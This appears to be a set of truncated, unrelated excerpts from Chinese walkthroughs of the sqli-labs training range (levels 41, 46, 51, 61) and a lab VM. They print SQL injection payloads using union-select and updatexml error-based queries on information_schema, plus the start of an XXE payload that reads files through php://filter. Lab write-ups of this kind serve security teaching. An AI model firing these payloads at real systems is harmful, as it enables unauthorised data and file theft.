Less-61 步骤一:查看数据库 ?id=1')) and updatexml(1,concat(1,(select database())),1)--+ 步骤二:查看表名 ?id=1')) and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where ta
1、登录靶机,查询是否有注入点 2、判断闭合方式 输入OSINT' and 1=1 # 输入OSINT' and 1=2 # 得出闭合方式为单引号 2、查询数据库名 输入-1' union select database(),2,3 # 3、查询数据库中的表 输入-1' union select group_concat(table_name),2,3 from informa
Less-51 1、判断闭合方式 输入?sort=1' --+ 页面闭合成功 2、查询数据库 输入?sort=-1' and updatexml(1,concat(1,database()),1) --+ 3、查询数据库中的表 输入?sort=-1' and updatexml(1,concat(1,(select group_concat(table_name) from in
首先我们进行端口扫描 扫出来端口之后去尝试得出地址为183 发现robots.txt文件 由此我们就得到了两个目录 我们先进入xxe目录,并开始登录抓包 并进入重放器在xml里面构造语句 <!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY admin SYSTEM "php://filter/read=convert.base64-en
主页有sqli-labs靶场通关攻略 1-45 第四六关 less-46 步骤一:利用报错注入查询库 ?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1) 步骤二:查询表名 ?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from in
sqli-labs-master靶场第四十一关 一,查看数据库 ?id=-1 union select 1,2,database()--+ 二,查看表名 ?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 三